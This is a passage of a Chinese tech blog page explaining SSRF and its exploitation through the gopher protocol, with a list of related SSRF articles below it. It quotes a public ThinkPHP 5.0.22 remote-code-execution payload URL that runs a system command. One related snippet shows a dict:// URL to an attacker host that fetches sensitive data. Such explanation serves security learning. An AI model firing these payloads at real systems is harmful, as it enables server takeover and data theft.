ssrf中gopher协议的利用

最新推荐文章于 2024-04-21 20:29:51 发布
最新推荐文章于 2024-04-21 20:29:51 发布
阅读量5.5k 收藏 15
点赞数 5
文章标签: SSRF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44632668/article/details/102631585
版权

SSRF漏洞如何产生

SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击
者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是
能够直接对目标网站的内部系统发起请求。(因为他是从内部系统访
问的,所以可以通过它攻击外网无法访问的内部系统,也就是把目标
网站当中间人)

gopher协议的利用

gopher 协议

Gopher是Internet.上一个很有名的信息查找系统,它将Internet.上的文件组织成某种索引,很方便用户获取。Gopher协议使得Internet上的所有Gopher客户程序能够与已注册的Gopher服务器对话。简单来说,在WWW出现之前,Gopher 是Internet.上最主要的检索工具。大家在学习认识的时候可以将其当做一个个等价于访问网页的正常请求方式
它的使用格式是gopher://URL。
在SSRF中经常会使用Gopher来构造GET/POST包攻击应用。

tp框架漏洞

这个漏洞是5.0.22版本的一个很著名的漏洞。

:对于一般的系统来说,没有补上的话,就会被攻击者构造get进行rce.

这是已经公开的payload

http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_ array&vars[0]=system&vars[1][]=id

具体大家可以看这位大佬写的博客

最低0.47元/天 解锁文章
V
关注
  • 5
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
渗透系列:【防守方基础】危险报文识别+Gopher协议SSRF漏洞的深入研究(附视频讲解)
01-08
渗透系列:【防守方基础】危险报文识别+Gopher协议SSRF漏洞的深入研究(附视频讲解)
SSRF利用协议的万金油——Gopher
qq_50854662的博客
02-23 2371
SSRF利用协议的万金油——Gopher
SSRF利用 Gopher 协议拓展攻击面
BerL1n
11-25 9809
1 概述 Gopher 协议可以做很多事情,特别是在 SSRF 可以发挥很多重要的作用。利用协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。 gophergopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是s...
SSRF—服务器请求伪造 漏洞详解
最新发布
m0_69043895的博客
04-21 1414
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造,由服务端发起请求的一个网络攻击,一般用来在外网探测或攻击内网服务,其影响效果根据服务器用的函数不同,从而造成不同的影响。SSRF 形成的原因大都是由于服务端提供了从其他服务器获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
SSRF漏洞-Gopher协议扩展利用
小刚的博客
08-20 2298
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 Gopher协议扩展利用Gopher协议利用要点利用方式小案例ssrf利用redis写入webshell Gopher协议 Gopher在HTTP协议前是非常有名的信息查找系统,但是很老了,很少服务会用到它 但是!在SSRF漏洞,它大方光彩,让SSRF漏洞利用更加广泛 利用协议可以对ftp,memchahe,mysql,telnet,redis,等服务进行攻击, 并可以构造发送GET,POST.
SSRF深度解析Gopher协议
qq_60115503的博客
04-25 4620
定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;
关于gopher协议ssrf攻击
qq_69775412的博客
04-26 3046
Gopher协议浅析 Gopher协议是internet的一个信息查找系统,俗称万能协议,可以通过gopher访问对应计算机上的其他资源,例如利用gopher实现:GET请求,POST请求,内网的redis,mysql(以及各类关系型数据库)未授权访问,以及MongoDB,Memcache等。 协议详情 端口 默认为70端口,可以自定义 协议格式 gopher://127.0.0.1:70/_[data] “
你未见过的SSRF利用方式
06-20
Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解⼀个ssrf的...
红蓝对抗SSRF深入利用实战.pdf
08-11
安全趋势 概述 SSRF简介 利用现状 利用困境 实战分享 Case 1 Case 2 Case 3
SSRF的利用方式
mingyqf的博客
11-06 6417
r3kind1e2021-03-10 03:30:32133923 SSRF的利用方式 本文对ctfhub和SSRF_Vulnerable_LabSSRF的利用方式进行了总结。 0x00 技能树 SSRF 常利用的相关协议 http://:探测内网主机存活、端口开放情况 gopher://:发送GET或POST请求;攻击内网应用,如FastCGI、Redis dict://:泄露安装软件版本信息,查看端口,操作内网redis访问等 file://:读取本地文件 Bypa...
SSRF一—WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
zyw268的博客
03-25 341
黑盒WEB-业务功能&URL关键字。SSRF-原理&挖掘&利用&修复。白盒CTF-绕过&伪协议&审计点。
CTFHUB--SRRF(上)--gopher协议
qq_75120258的博客
03-28 689
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
Gopher协议SSRF漏洞的深入研究
u012632105的博客
01-21 182
Gopher协议SSRF漏洞的深入研究(附视频讲解) - 知乎
ssrf漏洞原理是?ssrf漏洞有什么危害?如何挖掘和利用ssrf漏洞?ssrf常用的协议有哪些,并分别说明有啥作用?
weixin_57108799的博客
03-19 449
ssrf漏洞
WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
siu~
09-18 1607
1、SSRF-原理-外部资源加载 2、SSRF-利用-伪协议&无回显 3、SSRF-挖掘-业务功能&URL参数
Day57:WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
qq_61553520的博客
03-30 1697
小迪安全-Day57:WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
利用 Gopher 协议拓展攻击面
mingyqf的博客
06-06 459
Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议。当然现在 Gopher 协议已经慢慢淡出历史。 Gopher 协议可以做很多事情,特别是在 SSRF 可以发挥很多重要的作用。利用协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。根目录下 1.php 内容为: 2.2 攻击内网 Redis Redis 任意文件写入现在已经成为十分常见的一个漏洞,一般内网会存在 ro
ssrf dict伪协议
08-09
SSRF(Server-Side Request Forgery)是一种安全漏洞,它允许攻击者在目标服务器上执行未经授权的请求。而"dict"是一种用于查询字典数据的URL协议。 在SSRF,攻击者可以通过构造恶意请求,将目标服务器发送到指定的URL,包括dict协议。dict协议可以用于查询字典服务,如词典、翻译等。然而,dict协议也可以被滥用,用于进行SSRF攻击。 攻击者可以通过构造dict伪协议的URL,将目标服务器发送到一个字典服务,进而获取敏感信息或者执行未经授权的操作。例如,攻击者可以构造如下的URL: dict://attacker.com:80/getSensitiveData 在这个例子,攻击者将目标服务器发送到了attacker.com域名下的一个字典服务,并请求获取敏感数据。这样的攻击可以导致数据泄露、服务失效等安全问题。 为了防止SSRF攻击,开发人员需要在代码对用户输入进行严格的验证和过滤,并限制服务器发起请求的目标。此外,服务器也可以配置防火墙或者网络代理,限制对内部网络的访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值